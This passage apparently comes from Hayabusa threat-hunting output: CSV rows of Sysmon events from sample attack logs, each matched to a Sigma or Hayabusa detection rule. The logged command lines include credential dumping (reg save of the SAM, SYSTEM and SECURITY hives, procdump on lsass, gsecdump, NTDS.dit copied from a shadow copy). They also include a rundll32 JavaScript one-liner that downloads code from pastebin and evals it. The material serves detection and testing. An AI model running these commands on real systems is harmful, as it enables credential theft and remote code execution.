Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 
747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 
747F3D96-DD94-5D31-0000-0010F4864A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 
747F3D96-DD95-5D31-0000-001075964A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 
747F3D96-DD9B-5D31-0000-0010BE1E4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 
00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 
747F3D96-DD9E-5D31-0000-00105E414B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 
747F3D96-DD9F-5D31-0000-00102D4D4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 
747F3D96-DD9F-5D31-0000-00108D524B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 
747F3D96-AE22-5D3A-0000-001096B24E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in 